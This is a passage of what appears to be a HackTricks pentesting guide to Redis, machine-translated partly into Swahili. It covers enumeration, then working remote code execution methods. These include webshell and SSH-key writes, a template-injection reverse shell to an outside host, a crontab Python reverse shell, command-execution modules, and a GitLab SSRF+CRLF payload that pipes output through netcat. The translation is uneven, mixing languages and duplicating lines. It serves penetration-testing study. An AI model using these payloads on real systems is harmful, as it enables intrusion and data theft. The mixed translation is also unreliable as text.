# 6379 - Pentesting Redis
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
**Hacking Insights**\
Engage with content that delves into the thrill and challenges of hacking
**Real-Time Hack News**\
Keep up-to-date with fast-paced hacking world through real-time news and insights
**Latest Announcements**\
Stay informed with the newest bug bounties launching and crucial platform updates
**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
## Basic Information
From [the docs](https://redis.io/topics/introduction): Redis ni chanzo wazi (licence ya BSD), katika **hifadhi ya muundo wa data** ya ndani, inayotumika kama **hifadhi ya data**, cache na wakala wa ujumbe).
Kwa kawaida Redis hutumia protokali ya maandiko ya kawaida, lakini unapaswa kukumbuka kwamba inaweza pia kutekeleza **ssl/tls**. Jifunze jinsi ya [kuendesha Redis na ssl/tls hapa](https://fossies.org/linux/redis/TLS.md).
**Default port:** 6379
```
PORT STATE SERVICE VERSION
6379/tcp open redis Redis key-value store 4.0.9
```
## Automatic Enumeration
Baadhi ya zana za kiotomatiki ambazo zinaweza kusaidia kupata taarifa kutoka kwa mfano wa redis:
```bash
nmap --script redis-info -sV -p 6379
msf> use auxiliary/scanner/redis/redis_server
```
## Manual Enumeration
### Banner
Redis ni **protokali ya msingi wa maandiko**, unaweza tu **kutuma amri kwenye socket** na thamani zinazorejeshwa zitakuwa za kusomeka. Pia kumbuka kwamba Redis inaweza kukimbia kwa kutumia **ssl/tls** (lakini hii ni ya ajabu sana).
Katika mfano wa kawaida wa Redis unaweza tu kuungana kwa kutumia `nc` au unaweza pia kutumia `redis-cli`:
```bash
nc -vn 10.10.10.10 6379
redis-cli -h 10.10.10.10 # sudo apt-get install redis-tools
```
The **first command** you could try is **`info`**. It **may return output with information** of the Redis instance **or something** like the following is returned:
Amri ya **kwanza** unayoweza kujaribu ni **`info`**. Inaweza **kurudisha matokeo yenye taarifa** ya mfano wa Redis **au kitu** kama ifuatavyo:
```
-NOAUTH Authentication required.
```
In this last case, this means that **unahitaji akreditif za halali** to access the Redis instance.
### Redis Authentication
**Kwa kawaida** Redis inaweza kufikiwa **bila akreditif**. Hata hivyo, inaweza **kuwekwa** ili kuunga mkono **tu nenosiri, au jina la mtumiaji + nenosiri**.\
Inawezekana **kuweka nenosiri** katika _**redis.conf**_ file with the parameter `requirepass` **au ya muda** hadi huduma ipate kuanzishwa tena kwa kuungana nayo na kuendesha: `config set requirepass p@ss$12E45`.\
Pia, **jina la mtumiaji** linaweza kuwekwa katika parameter `masteruser` ndani ya _**redis.conf**_ file.
{% hint style="info" %}
If only password is configured the username used is "**default**".\
Pia, kumbuka kwamba hakuna **njia ya kupata kwa nje** ikiwa Redis iliwekwa na nenosiri pekee au jina la mtumiaji + nenosiri.
{% endhint %}
In cases like this one you will **hitaji kupata akreditif za halali** to interact with Redis so you could try to [**brute-force**](../generic-methodologies-and-resources/brute-force.md#redis) it.\
**Iwapo umepata akreditif za halali unahitaji kuthibitisha kikao** after establishing the connection with the command:
```bash
AUTH
```
**Sahihi akreditif** zitajibiwa na: `+OK`
### **Uthibitishaji wa orodha**
Ikiwa seva ya Redis inaruhusu **muunganisho wa siri** au ikiwa umepata akreditif sahihi, unaweza kuanzisha mchakato wa orodha kwa huduma hiyo kwa kutumia **amri** zifuatazo:
```bash
INFO
[ ... Redis response with info ... ]
client list
[ ... Redis response with connected clients ... ]
CONFIG GET *
[ ... Get config ... ]
```
**Amri nyingine za Redis** [**zinaweza kupatikana hapa**](https://redis.io/topics/data-types-intro) **na** [**hapa**](https://lzone.de/cheat-sheet/Redis)**.**
Kumbuka kwamba **amri za Redis za mfano zinaweza kubadilishwa jina** au kuondolewa katika faili _redis.conf_. Kwa mfano, mstari huu utaondoa amri FLUSHDB:
```
rename-command FLUSHDB ""
```
Zaidi kuhusu kuunda huduma ya Redis kwa usalama hapa: [https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04](https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04)
Unaweza pia **kufuatilia kwa wakati halisi amri za Redis** zinazotekelezwa kwa amri **`monitor`** au kupata **25 za maswali ya polepole zaidi** kwa **`slowlog get 25`**
Pata maelezo mengine ya kuvutia kuhusu amri zaidi za Redis hapa: [https://lzone.de/cheat-sheet/Redis](https://lzone.de/cheat-sheet/Redis)
### **Kutoa Hifadhidata**
Ndani ya Redis **hifadhidata ni nambari kuanzia 0**. Unaweza kuona kama yeyote inatumika katika matokeo ya amri `info` ndani ya sehemu ya "Keyspace":
.png>)
Au unaweza tu kupata **keyspaces** zote (hifadhidata) kwa:
```
INFO keyspace
```
Katika mfano huo, **database 0 na 1** zinatumika. **Database 0 ina funguo 4 na database 1 ina 1**. Kwa default, Redis itatumia database 0. Ili kutekeleza dump kwa mfano database 1 unahitaji kufanya:
```bash
SELECT 1
[ ... Indicate the database ... ]
KEYS *
[ ... Get Keys ... ]
GET
[ ... Get Key ... ]
```
Inapofanyika upungufu wa `-WRONGTYPE Operation against a key holding the wrong kind of value` wakati wa kuendesha `GET ` ni kwa sababu funguo inaweza kuwa kitu kingine zaidi ya mfuatano au nambari na inahitaji opereta maalum kuionyesha.
Ili kujua aina ya funguo, tumia amri ya `TYPE`, mfano hapa chini kwa funguo za orodha na hash.
```bash
TYPE
[ ... Type of the Key ... ]
LRANGE 0 -1
[ ... Get list items ... ]
HGET
[ ... Get hash item ... ]
# If the type used is weird you can always do:
DUMP
```
**Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/)
Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server kuwasiliana na hackers wenye uzoefu na hunters wa bug bounty!
**Hacking Insights**\
Shiriki na maudhui yanayochunguza msisimko na changamoto za hacking
**Real-Time Hack News**\
Endelea kuwa na habari za hivi punde katika ulimwengu wa hacking kupitia habari na maarifa ya wakati halisi
**Latest Announcements**\
Baki na habari kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa
**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
## Redis RCE
### Interactive Shell
[**redis-rogue-server**](https://github.com/n0b0dyCN/redis-rogue-server) inaweza kupata kiolesura cha mazungumzo au shell ya kurudi katika Redis(<=5.0.5).
```
./redis-rogue-server.py --rhost --lhost
```
### PHP Webshell
Taarifa kutoka [**hapa**](https://web.archive.org/web/20191201022931/http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html). Lazima ujue **njia** ya **folda ya Tovuti**:
```
root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /usr/share/nginx/html
OK
10.85.0.52:6379> config set dbfilename redis.php
OK
10.85.0.52:6379> set test ""
OK
10.85.0.52:6379> save
OK
```
Ikiwa kuna hitilafu ya ufikiaji wa webshell, unaweza kufuta database baada ya kuhifadhi nakala na kujaribu tena, kumbuka kurejesha database.
### Template Webshell
Kama katika sehemu iliyopita unaweza pia kufuta faili fulani ya template ya html ambayo itatafsiriwa na injini ya template na kupata shell.
Kwa mfano, kufuatia [**hii andiko**](https://www.neteye-blog.com/2022/05/cyber-apocalypse-ctf-2022-red-island-writeup/), unaweza kuona kwamba mshambuliaji alingiza **rev shell katika html** iliyotafsiriwa na **nunjucks template engine:**
```javascript
{{ ({}).constructor.constructor(
"var net = global.process.mainModule.require('net'),
cp = global.process.mainModule.require('child_process'),
sh = cp.spawn('sh', []);
var client = new net.Socket();
client.connect(1234, 'my-server.com', function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});"
)()}}
```
{% hint style="warning" %}
Kumbuka kwamba **moto wa injini kadhaa za templeti** huhifadhi **templeti** katika **kumbukumbu**, hivyo hata kama unazifuta, mpya **haitatekelezwa**. Katika hali hizi, ama mendelezi aliacha upakiaji wa moja kwa moja ukiendelea au unahitaji kufanya DoS juu ya huduma (na kutarajia kwamba itazinduliwa tena kiotomatiki).
{% endhint %}
### SSH
Mfano [kutoka hapa](https://blog.adithyanak.com/oscp-preparation-guide/enumeration)
Tafadhali fahamu kwamba **`config get dir`** matokeo yanaweza kubadilishwa baada ya amri nyingine za kuchokoza kwa mikono. Pendekeza kuikimbia kwanza mara tu baada ya kuingia kwenye Redis. Katika matokeo ya **`config get dir`** unaweza kupata **nyumba** ya **mtumiaji redis** (kawaida _/var/lib/redis_ au _/home/redis/.ssh_), na ukijua hili unajua wapi unaweza kuandika faili la `authenticated_users` ili kufikia kupitia ssh **na mtumiaji redis**. Ikiwa unajua nyumba ya mtumiaji mwingine halali ambapo una ruhusa za kuandika unaweza pia kuitumia vibaya:
1. Tengeneza jozi ya funguo za ssh za umma binafsi kwenye pc yako: **`ssh-keygen -t rsa`**
2. Andika funguo ya umma kwenye faili : **`(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt`**
3. Ingiza faili kwenye redis : **`cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key`**
4. Hifadhi funguo ya umma kwenye faili la **authorized\_keys** kwenye seva ya redis:
```
root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /var/lib/redis/.ssh
OK
10.85.0.52:6379> config set dbfilename "authorized_keys"
OK
10.85.0.52:6379> save
OK
```
5. Hatimaye, unaweza **ssh** kwenye **seva ya redis** na funguo binafsi : **ssh -i id\_rsa redis@10.85.0.52**
**Teknolojia hii imejumuishwa hapa:** [https://github.com/Avinash-acid/Redis-Server-Exploit](https://github.com/Avinash-acid/Redis-Server-Exploit)
### Crontab
```
root@Urahara:~# echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.85.0.53\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.85.0.52 -x set 1
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dir /var/spool/cron/crontabs/
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dbfilename root
OK
root@Urahara:~# redis-cli -h 10.85.0.52 save
OK
```
The last example is for Ubuntu, for **Centos**, the above command should be: `redis-cli -h 10.85.0.52 config set dir /var/spool/cron/`
Hii mbinu pia inaweza kutumika kupata bitcoin :[yam](https://www.v2ex.com/t/286981#reply14)
### Load Redis Module
1. Kufuatia maelekezo kutoka [https://github.com/n0b0dyCN/RedisModules-ExecuteCommand](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand) unaweza **kusanifu moduli ya redis ili kutekeleza amri zisizo na mipaka**.
2. Kisha unahitaji njia fulani ya **kupakia moduli iliyosanifiwa**
3. **Pakia moduli iliyopakiwa** wakati wa utendaji na `MODULE LOAD /path/to/mymodule.so`
4. **Orodhesha moduli zilizopakiwa** ili kuangalia kama imepakiwa vizuri: `MODULE LIST`
5. **Tekeleza** **amri**:
```
127.0.0.1:6379> system.exec "id"
"uid=0(root) gid=0(root) groups=0(root)\n"
127.0.0.1:6379> system.exec "whoami"
"root\n"
127.0.0.1:6379> system.rev 127.0.0.1 9999
```
6. Ondoa moduli wakati wowote unapotaka: `MODULE UNLOAD mymodule`
### LUA sandbox bypass
[**Hapa**](https://www.agarri.fr/blog/archives/2014/09/11/trying\_to\_hack\_redis\_via\_http\_requests/index.html) unaweza kuona kwamba Redis inatumia amri **EVAL** kutekeleza **kodii ya Lua iliyowekwa kwenye sanduku**. Katika chapisho lililounganishwa unaweza kuona **jinsi ya kuitumia vibaya** kwa kutumia kazi ya **dofile**, lakini [kwa kweli](https://stackoverflow.com/questions/43502696/redis-cli-code-execution-using-eval) hii si tena inawezekana. Hata hivyo, ikiwa unaweza **kuepuka sanduku la Lua** unaweza **kutekeleza amri zisizo na mipaka** kwenye mfumo. Pia, kutoka chapisho hilo hilo unaweza kuona baadhi ya **chaguzi za kusababisha DoS**.
Baadhi ya **CVEs za kutoroka kutoka LUA**:
* [https://github.com/aodsec/CVE-2022-0543](https://github.com/aodsec/CVE-2022-0543)
### Master-Slave Module
Moduli ya master redis inafanya kazi zote kuunganishwa moja kwa moja na slave redis, ambayo inamaanisha kwamba tunaweza kuzingatia udhaifu wa redis kama slave redis, iliyounganishwa na master redis ambayo tunadhibiti, kisha tunaweza kuingiza amri kwenye redis yetu.
```
master redis : 10.85.0.51 (Hacker's Server)
slave redis : 10.85.0.52 (Target Vulnerability Server)
A master-slave connection will be established from the slave redis and the master redis:
redis-cli -h 10.85.0.52 -p 6379
slaveof 10.85.0.51 6379
Then you can login to the master redis to control the slave redis:
redis-cli -h 10.85.0.51 -p 6379
set mykey hello
set mykey2 helloworld
```
## SSRF kuzungumza na Redis
Ikiwa unaweza kutuma ombi **la maandiko safi** **kwa Redis**, unaweza **kuwasiliana nayo** kwani Redis itasoma mstari kwa mstari ombi hilo na itajibu tu kwa makosa kwa mistari ambayo haielewi:
```
-ERR wrong number of arguments for 'get' command
-ERR unknown command 'Host:'
-ERR unknown command 'Accept:'
-ERR unknown command 'Accept-Encoding:'
-ERR unknown command 'Via:'
-ERR unknown command 'Cache-Control:'
-ERR unknown command 'Connection:'
```
Kwa hivyo, ikiwa unapata **SSRF vuln** kwenye tovuti na unaweza **kontroli** baadhi ya **headers** (labda kwa kutumia vuln ya CRLF) au **POST parameters**, utaweza kutuma amri zisizo na mipaka kwa Redis.
### Mfano: Gitlab SSRF + CRLF kwa Shell
Katika **Gitlab11.4.7** iligundulika **SSRF** udhaifu na **CRLF**. Udhaifu wa **SSRF** ulikuwa katika **import project from URL functionality** wakati wa kuunda mradi mpya na uliruhusu kufikia IP zisizo na mipaka katika mfumo \[0:0:0:0:0:ffff:127.0.0.1] (hii itafikia 127.0.0.1), na **CRLF** vuln ilitumiwa kwa ku **ongeza %0D%0A** wahusika kwenye **URL**.
Kwa hivyo, ilikuwa inawezekana **kutumia udhaifu hizi kuzungumza na Redis instance** ambayo **inasimamia foleni** kutoka **gitlab** na kutumia foleni hizo ili **kupata utekelezaji wa msimbo**. Payload ya matumizi ya foleni ya Redis ni:
```
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
```
Na **URL encode** ombi **linalotumia SSRF** na **CRLF** kutekeleza `whoami` na kutuma nyuma matokeo kupitia `nc` ni:
```
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git
```
_Kwa sababu fulani (kama ilivyo kwa mwandishi wa_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _ambapo taarifa hii ilichukuliwa) matumizi ya udhaifu yalifanya kazi na mpango wa `git` na si mpango wa `http`._
Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na wawindaji wa makosa!
**Uelewa wa Udukuzi**\
Shiriki na maudhui yanayoingia katika msisimko na changamoto za udukuzi
**Habari za Udukuzi kwa Wakati Halisi**\
Endelea kuwa na habari za kisasa katika ulimwengu wa udukuzi kupitia habari na uelewa wa wakati halisi
**Matangazo ya Hivi Punde**\
Baki na habari kuhusu makosa mapya yanayoanzishwa na masasisho muhimu ya jukwaa
**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na hackers bora leo!
{% hint style="success" %}
Jifunze na fanya mazoezi ya Udukuzi wa AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Jifunze na fanya mazoezi ya Udukuzi wa GCP: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki hila za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
{% endhint %}
.png)
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
[**HackTricks Training GCP Red Team Expert (GRTE)**